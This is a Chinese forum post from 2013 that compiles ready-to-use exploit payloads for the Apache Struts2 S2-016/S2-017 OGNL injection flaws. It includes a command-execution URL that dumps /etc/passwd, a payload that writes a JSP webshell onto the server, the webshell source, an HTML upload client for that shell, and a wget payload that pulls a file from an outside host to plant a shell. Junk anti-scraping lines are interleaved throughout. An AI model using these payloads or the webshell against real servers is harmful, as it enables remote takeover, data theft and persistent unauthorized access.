标题:
Struts2 S2-016/S2-017漏洞执行代码
作者:
admin
时间:
2013-7-18 23:03
标题:
Struts2 S2-016/S2-017漏洞执行代码
大家都发了，我就整理了一下。友情提示：自己小命比shell重要哦。
9 q0 d# L; [. e# F
7 p/ w y* D J) k
喜欢就点一下感谢吧^_^
9 N( ]8 {) S. S2 M! B. {
% Y0 G9 |% W: B1 u9 M8 ]+ Q0 \- |
带回显命令执行:
2 [2 w( ^9 X$ n% Z! R' ^+ a$ P
1 Y k. i: H, p9 _
http://www.example.com/struts2-blank/example/X.action?redirect:
${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
0 t- G$ {/ a! C8 B
: {0 A$ r$ \! C, L
1 G+ |0 h, Y& u! m! _
: n' r# S# k! m4 K z! j; l# ^
, ^; b7 C+ D% U
2 I7 B. Y0 E! W/ t- |/ s
) T: s) g! T% r: B& K9 \: u& e0 \4 x
, {1 D" `* a) A
爆路径:
+ c9 z( k) u) c' Z3 f
+ x2 e$ I: p; E+ N7 N
http://www.example.com/struts2-b ... 8%29.close%28%29%7D
1 [. J: L+ u$ ]0 ^7 e
& \; g: Z' w, j: V% v z Y
( U7 t9 s1 |, c0 {5 O" U; `
! w a; b1 B& }/ v5 h6 A
& N/ p8 F) T& L# C+ U
+ ~0 N! O2 I B+ E* X9 [2 O
写文件:
/ }1 Y5 w) A g( J- D
2 k: k0 k, P8 m$ {5 x
http://www.example.com/struts2-blank/example/X.action?redirect:
${
5 K5 b2 D4 o1 O" y: `. |; T$ P
0 x4 Y% R+ Q- c! A
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
: [2 t7 E! z4 {! g1 }5 P. o$ c, C
5 C/ z1 P& E9 t
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
! k- S- |% q H8 V$ Q
9 `6 D p, \: X1 C
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
& }" H u9 K( r$ W, V" r
+ l) i2 z0 T* P1 }5 ~8 ]; J
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
, ~) g. K9 p4 \1 m5 t$ i
) g6 e' L, n [* j$ G- X, }
) I9 M/ n) i; H' x& ^, X
3 C7 [+ v: y. y( D% `% ]: U
写入的文件内容:
! C# Y8 ?" C& I/ X% ^9 d
( a! n G _( O+ ]# d& J- I$ Z
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
6 n5 ~! g" V+ B) a7 u6 x8 B, U
; _. r0 A5 @1 x H( K ?
其实就是一个jsp的小马,需要客户端配合
: i2 W' b% x) N, t& e& w
9 C' w+ g/ ]% y9 }5 V/ i% F
参数f是文件名，t是内容
+ M6 W3 r5 {- [( I% @1 I
: r) {+ M" G# z. J$ F9 J; `6 G( g4 z
客户端:
" H8 Q, `: g# W2 ^) \
8 S" O* U$ D# w8 Y4 }- D% Q
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
( {$ W, ~ d& G; i$ C
$ g6 x3 V$ K1 W! L3 ?8 n0 ]0 Q- T& g
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
6 B: t# j8 u( Z: g% T3 U
; b( d6 ^* s) m; v, J* t
<center>
" x* r: a' v7 w
# C2 K7 d+ b1 _# v! i/ J' |
$ K q% S+ `% \7 v, I
4 r. W- F2 X0 C$ G
<input type=submit value="提交">
# Z) W O! @1 v! Y6 D
) o2 `9 ?: h, r
</form>
( {' y( u8 r' |' e
/ g ]1 x( f9 h: S4 }
就在当前目录建立一个fjp.jsp
9 P1 P$ q3 r# c4 s
+ z' \' \( Y: y
shell:
http://www.example.com/struts2-blank/example/fjp.jsp
. j( V) K8 \ L( U& N, p6 ~
# n, N% \' x* b4 P
: z. y i0 h, i
0 z) B: ]4 X" ]& q+ e* O* D
还有@园长的一个客户端:
/ U0 x8 L! |/ G4 y% X
4 G2 r( H( h1 Z" ~2 c
<html>
) h" z& M9 h: I
l3 ^ R: d7 U; D7 Q" b
<head>
) g- Y* ]8 N& [* }) _+ a
+ }5 R8 L/ Q8 P' d3 H/ I
<meta http-equiv="content-type" content="text/html;charset=utf-8">
& R2 b/ f% O. G
1 D' v7 S0 b/ V- L) h$ |& s' z
<title>jsp-园长</title>
: l& o+ a5 } N8 P
* l: X+ L( x! c9 `4 r4 Z& Z
</head>
/ u& D8 B& X; s
7 v5 m, {$ s! {/ j+ o
<style>
2 l$ v4 Y; U1 U {4 D! G, S3 S
* r* T& ]* d: o
.main{width:980px;height:600px;margin:0 auto;}
1 H+ m) x5 ^% Q3 q3 n% y
9 L8 P+ Q" B" l! s* w
.url{width:300px;}
7 Z% C. k. y9 V2 H2 Y4 f
^* o; B& m/ v% A- v
.fn{width:60px;}
3 m$ }# J2 B- U6 Z; `5 f/ ^
8 J3 F' ?+ e$ w( Z: X' c: Z* D2 N
.content{width:80%;height:60%;}
3 \% E4 K. g: C. G7 x
1 A0 d. R+ k7 l
</style>
2 d; G% K9 @. Z$ \: B
; O- |" D& P" Y
<script>
8 I6 Y" L% V5 B9 S8 \
' w( [6 Z4 `3 `# i2 o5 |
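/**
 * Click handler for the "Upload" link on this page.
 *
 * Reads the target URL, the file name and the file content from the
 * `url`, `fn` and `content` inputs, refuses to continue if any of them is
 * empty, then points the `fm` form at that URL and submits it. What gets
 * posted is whatever fields the form itself carries (`f` and `t` in the
 * surrounding markup); this function only sets the destination.
 *
 * Depends on the browser globals `document` and `alert`. Returns nothing.
 */
function upload() {
  const url = document.getElementById('url').value;
  const content = document.getElementById('content').value;
  const fileName = document.getElementById('fn').value;
  const form = document.getElementById('fm');

  // Only strict emptiness is rejected; whitespace-only values still pass,
  // which matches the original behaviour.
  if (url.length === 0) {
    alert('Url not allowed empty!');
    return;
  }
  if (content.length === 0) {
    alert('Content not allowed empty!');
    return;
  }
  if (fileName.length === 0) {
    alert('FileName not allowed empty!');
    return;
  }

  // The form action is taken verbatim from the text box, so the POST goes
  // to whatever address was typed there.
  form.action = url;
  form.submit();
}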
$ m! Y/ ~0 r& e) S$ g
8 ^/ d: j* e0 ?- y- h
</script>
1 c/ B2 a/ B2 a2 V9 ^
5 P) f- H% j6 O: u" G" h
<body>
; v7 ^- L- F3 z
% s$ \5 x( R! h+ P6 V7 _
<div class="main">
8 N2 S5 c) G& U/ O2 N3 w6 u# W
3 @+ D0 X; ~+ A6 O
<form id="fm" method="post">
+ h0 N j8 i. I* K
6 P/ S" V6 u. H9 K8 M o1 F
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
+ l# H2 k e% q
2 ]1 ^" l% S4 j
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
% A/ u- J2 n8 Z/ f# R
' E& L( g. q6 o4 L
<a href="javascript:upload();">Upload</a>
8 v( P7 w+ g2 {! J4 B
" o4 T; l2 ~( r9 P
1 D1 c1 Z& q9 d4 }- Z% Q* E, l
! p, y% s& m! k# X
<textarea id="content" class="content" name="t" ></textarea>
3 ~2 K [# b1 w% k
( k' K) J. Z4 u, C
</form>
& D& f/ y2 R- p9 a1 x" ]) L
) b" Z8 C3 ~3 H: x; t' S
</div>
8 H O, \; }* w# C* t' S; y
5 a# Q V& Z ~5 S) [3 J
</body>
3 J7 O; E$ a# m$ d
4 s- G3 b1 x3 n' s! S2 j
</html>
. h' m9 T2 ]* Y y
* w: q+ P: ]1 {7 P4 Z3 m
; G3 \; H6 t: b s
7 m8 D$ l; F5 A/ g g. f
还有@X发的一个wget的getshell
& m' q/ d& I7 y! A; v
E% a; [2 \: ~1 H
?redirect
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
+ h' Z1 m }: U0 U0 S
; A) H6 n7 e8 Q% n* A/ I% ]
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
+ [ O; m6 |. e' y$ E* Z